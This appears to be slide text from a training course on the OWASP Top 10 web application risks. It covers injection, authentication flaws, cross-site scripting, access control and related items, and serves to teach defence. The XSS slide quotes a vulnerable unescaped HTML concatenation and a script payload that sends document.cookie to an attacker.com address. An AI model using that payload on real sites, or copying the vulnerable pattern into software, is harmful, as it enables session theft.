Web Based Application 
Risks and Threats 


Objectives 


• Discuss web based application threats and risks
• Explain the OWASP Top 10


OWASP Top 10 


• OWASP - Open Web Application Security Project
• Started in 2001 and officially 2004
• Designed to educate about secure software
• Top 10
  • Represents the top 10 most critical risks to web applications
  • Released every few years to help developers and the community pay attention to risks
• Latest Top 10
  • 2013
  • 2017 - to be released in July or August of 2017


A1 - Injection


• Injection flaws have been at the top of the list for years

• Covers:
  • SQL
  • Command
  • XXE
  • LDAP

• Attacker sends untrusted data to a system that interprets the data

• Attacker can do almost anything depending on what software is running for the interpreter.


A2 - Broken Authentication and 
Session Management 


• User sessions can be hijacked

• Information that can be stolen or accessed
  • Session ID
  • Usernames
  • Passwords
  • Account information
  • Cookies

• Poor authentication coding methods allow attackers to gain access


A3 - Cross-Site Scripting 


• Very widespread issue

• Can be executed on either the server or the client
• Can also be stored or reflected attacks

• Attackers execute scripts via a browser

• The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:
  • (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
• The attacker modifies the 'CC' parameter in his browser to:
  • '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
• This attack causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session.


A4 - Broken Access Control 


• Attackers use insufficient security measures to bypass authentication mechanisms

• Example: http://example.com/app/accountinfo?acct=notmyacct
  • Change in parameter values allow access


A5 - Security Misconfiguration 


• See the misconfiguration video


A6 - Sensitive Data Exposure 


• Really this is just data exposure
• Can happen a number of different ways

• Most breaches occur because someone did not encrypt the data properly

• Can be used in conjunction with other methods


A7 - A10 


• Dives into protection
  • A7 - Insufficient Attack Protection

• A8 - Cross-Site Request Forgery - while this isn't protection, it acts the same way as XSS

• A9 - Using Components with Known Vulnerabilities
• A10 - Underprotected APIs


